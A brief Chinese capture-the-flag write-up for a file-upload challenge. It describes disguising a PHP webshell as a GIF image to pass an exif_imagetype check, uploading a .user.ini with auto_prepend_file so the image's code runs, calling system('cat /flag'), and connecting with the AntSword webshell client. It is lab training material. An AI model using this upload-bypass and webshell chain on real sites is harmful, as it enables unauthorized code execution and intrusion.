题目
页面显示
上传文件,随便上传一个文件试试
上传了一个文本,显示失败,不是图片
那就换图片马上传试试
不能包含<?,换一种写法,需要加上GIF89a,进行exif_imagetype绕过
上传成功
这里用.user.ini或者用post传参system('cat/flag')
.user.ini内容为
GIF89a
auto_prepend_file=a.jpg
上传成功
使用蚁剑进行连接
注意这里的url为
http://ac3fab2e-e43b-4cb0-b27c-75c8bdb37ac3.node4.buuoj.cn:81/uploads/c55e0cb61f7eb238df09ae30a206e5ee/index.php
找到flag
